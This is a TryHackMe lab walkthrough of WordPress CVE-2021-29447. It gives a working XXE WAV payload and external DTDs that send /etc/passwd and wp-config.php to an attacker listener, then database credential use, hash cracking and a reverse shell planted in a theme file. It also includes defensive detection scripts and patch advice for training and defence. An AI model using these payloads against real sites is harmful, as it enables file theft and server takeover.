
TryHackMe - Wordpress CVE-2021-29447 (Linux)

Walkthrough of the TryHackMe WordPress CVE-2021-29447 Linux machine, covering the practical exploitation steps and the privilege escalation techniques recorded for it.


Overview

Item                        Content
OS                          Linux
Difficulty                  Not recorded
Target                      Not recorded
Main entry vectors          xxe, arbitrary-file-read, credential-harvest
Privilege escalation path   Not implemented (no record)

Reconnaissance

1. PortScan


Rustscan

💡 Why this works
High-quality reconnaissance narrows a large attack surface into a few validated exploitation paths. Accurate service mapping prevents time loss and supports targeted follow-up testing.

Initial Foothold

Not implemented (not recorded in PDF)

Nmap

Not implemented (not recorded in PDF)

2. Local Shell


This walkthrough starts from CVE-2021-29447 (an XXE in WordPress media handling), recovers the DB credentials from wp-config.php, and finally achieves RCE through the admin dashboard.

2-1. Embed the XXE payload in a WAV (iXML chunk)

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSERVERIP:9999/evil.dtd'"'"'>%remote;%init;%trick;]>' > payload.wav
cat payload.wav
RIFF�WAVEiXML{<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://10.18.55.118:9999/evil.dtd'>%remote;%init;%trick;]>

2-2. Host an external DTD and read files

To pull /etc/passwd:

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:9999/?p=%file;'>" >

To pull wp-config.php:

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/var/www/html/wp-config.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:9999/?p=%file;'>" >

Listener:

php -S 0.0.0.0:9999

Upload payload.wav through the WordPress media uploader, then decode the data that comes back to the listener to obtain the DB details from wp-config.php.
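As an added defensive example (not part of the original writeup), the Python script below walks the RIFF chunk list of an uploaded WAV and flags an iXML chunk that carries a DOCTYPE or entity declaration, which a legitimate iXML metadata block never needs. It tolerates declared chunk sizes that do not match the file content, as in the hand-made header above (RIFF length 0xb8), rather than failing to inspect the file. The sample files, the DTD-HOST.example URL and the marker list are constructed for this example; the durable fix is patching WordPress (the issue was fixed in 5.7.1) and keeping external entity resolution disabled in any XML parser that touches uploads.

```python
import struct

# Tokens a benign iXML metadata block never needs but an XXE payload does.
XXE_MARKERS = (b"<!DOCTYPE", b"<!ENTITY", b"SYSTEM", b"PHP://FILTER")


def iter_riff_chunks(data: bytes):
    """Yield (chunk_id, payload) for every chunk of a RIFF/WAVE container.

    A declared size that overruns the file (common in hand-crafted payloads)
    simply yields the truncated bytes instead of raising.
    """
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        chunk_id = data[pos:pos + 4]
        (size,) = struct.unpack("<I", data[pos + 4:pos + 8])
        yield chunk_id, data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)  # chunk bodies are padded to even length


def scan_wav_for_xxe(data: bytes) -> list:
    """Return the XXE markers found inside iXML chunks (empty list = clean)."""
    found = []
    for chunk_id, payload in iter_riff_chunks(data):
        if chunk_id != b"iXML":
            continue
        upper = payload.upper()
        for marker in XXE_MARKERS:
            if marker in upper and marker.decode() not in found:
                found.append(marker.decode())
    return found


def build_wav(chunks) -> bytes:
    """Assemble a well-formed RIFF/WAVE file from (chunk_id, payload) pairs."""
    body = b"WAVE"
    for chunk_id, payload in chunks:
        body += chunk_id + struct.pack("<I", len(payload)) + payload
        if len(payload) & 1:
            body += b"\x00"
    return b"RIFF" + struct.pack("<I", len(body)) + body


# --- constructed samples ---------------------------------------------------
FMT_CHUNK = struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)  # PCM, mono, 8 kHz
BENIGN_WAV = build_wav([
    (b"fmt ", FMT_CHUNK),
    (b"iXML", b"<?xml version='1.0'?><BWFXML><IXML_VERSION>1.5</IXML_VERSION></BWFXML>"),
    (b"data", b"\x00" * 16),
])
NO_IXML_WAV = build_wav([(b"fmt ", FMT_CHUNK), (b"data", b"\x00" * 16)])

# Same shape as the writeup's hand-made file: declared RIFF/iXML lengths that
# were not computed from the content, and an inline DOCTYPE that pulls an
# external parameter entity (DTD-HOST.example is a placeholder).
PAGE_STYLE_WAV = (
    b"RIFF" + struct.pack("<I", 0xB8) + b"WAVEiXML" + struct.pack("<I", 0x7B)
    + b'<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '
    + b"'http://DTD-HOST.example:9999/evil.dtd'>%remote;%init;%trick;]>"
)


if __name__ == "__main__":
    for name, blob in [("benign", BENIGN_WAV), ("no-ixml", NO_IXML_WAV),
                       ("page-style", PAGE_STYLE_WAV)]:
        print(f"{name:10s} -> {scan_wav_for_xxe(blob) or 'clean'}")
```

A check like this belongs in front of the media library (an upload filter or a scanner over the uploads directory); it is a detection aid, not a substitute for the patch, because the XML parser in the metadata extractor is what must stop resolving external entities.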

2-3. Connect to the DB and retrieve the user hash

mysql -u thedarktangent -p -h 10.10.42.190
show databases;
use wordpressdb2;
show tables;
SELECT * FROM wptry_users;
SELECT ID, user_login, user_pass FROM wptry_users WHERE ID = 1;
Server version: 5.7.33-0ubuntu0.16.04.1 (Ubuntu)
Database: wordpressdb2
Extracted hash: $P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1

2-4. Hash cracking

john wp-pass.hash --wordlist=~/thm/rockyou.txt
teddybear (?)

2-5. RCE from the WordPress admin dashboard

  1. Log in to the WordPress admin dashboard as corp-001 / teddybear
  2. Open Appearance > Theme Editor
  3. Insert the reverse-shell PHP into 404.php of the Twenty Nineteen theme
  4. Trigger it with:
curl http://IP address/wp-content/themes/twentynineteen/404.php

Note: the PDF notes used a reverse shell generated at https://reverse.7sec.pw.
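The step above leaves a distinctive trace in the web server log: an authenticated client saves a file through the theme editor and shortly afterwards requests a theme .php file directly. The following Python detector, added here as an example and not taken from the writeup, runs that correlation over combined-format access log lines. The log lines, client addresses and the ten-minute window are constructed; it assumes the editor save is logged as a POST to /wp-admin/theme-editor.php (if your WordPress version saves through admin-ajax.php instead, adjust EDITOR_PATH). The preventive control is `define('DISALLOW_FILE_EDIT', true);` in wp-config.php, which removes the theme and plugin editors altogether.

```python
import re
from datetime import datetime, timedelta

# Apache/nginx "combined" format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
EDITOR_PATH = "/wp-admin/theme-editor.php"          # assumed save endpoint
THEME_PHP_RE = re.compile(r"^/wp-content/themes/[^/]+/.+\.php$")


def parse_line(line: str):
    """Parse one access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def detect_theme_editor_abuse(lines, window=timedelta(minutes=10)):
    """Flag a client that saves through the theme editor and then fetches a
    theme .php file directly within `window`. Returns (ip, path) tuples."""
    last_save = {}   # client ip -> timestamp of its most recent editor save
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == EDITOR_PATH:
            last_save[rec["ip"]] = rec["ts"]
        elif rec["method"] == "GET" and THEME_PHP_RE.match(rec["path"]):
            saved_at = last_save.get(rec["ip"])
            if saved_at is not None and rec["ts"] - saved_at <= window:
                alerts.append((rec["ip"], rec["path"]))
    return alerts


# Constructed sample log (documentation address ranges, not real clients).
SAMPLE_LOG_LINES = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
    '203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /wp-admin/theme-editor.php?file=404.php&theme=twentynineteen HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:56:40 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0',
    '198.51.100.2 - - [10/Oct/2023:13:57:02 +0000] "GET /wp-content/themes/twentynineteen/style.css HTTP/1.1" 200 911',
    '203.0.113.7 - - [10/Oct/2023:13:57:15 +0000] "GET /wp-content/themes/twentynineteen/404.php HTTP/1.1" 200 0',
    '198.51.100.2 - - [10/Oct/2023:13:58:00 +0000] "GET /wp-content/themes/twentynineteen/404.php HTTP/1.1" 200 0',
]


if __name__ == "__main__":
    for ip, path in detect_theme_editor_abuse(SAMPLE_LOG_LINES):
        print(f"ALERT: {ip} saved via theme editor, then requested {path}")
```

Only the client that performed the editor save is reported; the second client requesting 404.php without a preceding save is a normal theme file fetch and stays quiet, which keeps the rule usable on a busy site.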

No record

💡 Why this works
Initial access succeeds when enumeration findings are turned into a practical exploit chain. Capturing credentials, file disclosure, or direct RCE creates reliable pivot points for privilege escalation.

Privilege Escalation

3. Privilege Escalation


The PDF notes do not record any local privilege escalation steps, so none are performed here. When they are added, record the verification log in this order: sudo -l / SUID / cron / capabilities / writable scripts.

💡 Why this works
Privilege escalation depends on chaining local weaknesses such as sudo misconfiguration, weak file permissions, or credential reuse. If a GTFOBins technique is used, the mechanism is that an allowed binary executes a child process or shell without dropping elevated effective privileges.

Credentials

MariaDB
- username: thedarktangent
- password: (the value recorded in wp-config.php)

WordPress
- username: corp-001
- password: teddybear

Hash
- $P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1

Summary / Lessons learned

4. Overview


flowchart LR
    subgraph SCAN["🔍 Scan"]
        direction TB
        S1["WordPress attack surface\nMedia upload path\n(no scan log in PDF)"]
    end

    subgraph INITIAL["💥 Initial Foothold"]
        direction TB
        I1["CVE-2021-29447 XXE\nWAV(iXML) + evil.dtd\nphp -S 0.0.0.0:9999"]
        I2["Read wp-config.php\nExtract DB creds\nmysql -u thedarktangent -p -h TARGET"]
        I3["Dump wptry_users hash\njohn wp-pass.hash --wordlist=...\ncorp-001:teddybear"]
        I4["Authenticated theme edit RCE\nInject reverse shell into 404.php\ncurl /wp-content/themes/.../404.php"]
    end

    subgraph PRIVESC["⬆️ Privilege Escalation"]
        direction TB
        P1["No privilege escalation log\nNeed post-exploitation enumeration"]
    end

    SCAN --> INITIAL --> PRIVESC

CVE Notes

  • CVE-2021-29447: Publicly tracked vulnerability referenced in this writeup; verify affected versions and exploit prerequisites before use.

References

  • nmap
  • rustscan
  • john
  • sudo
  • curl
  • cat
  • base64
  • php
  • CVE-2021-29447
  • GTFOBins
This post is licensed under CC BY 4.0 by the author.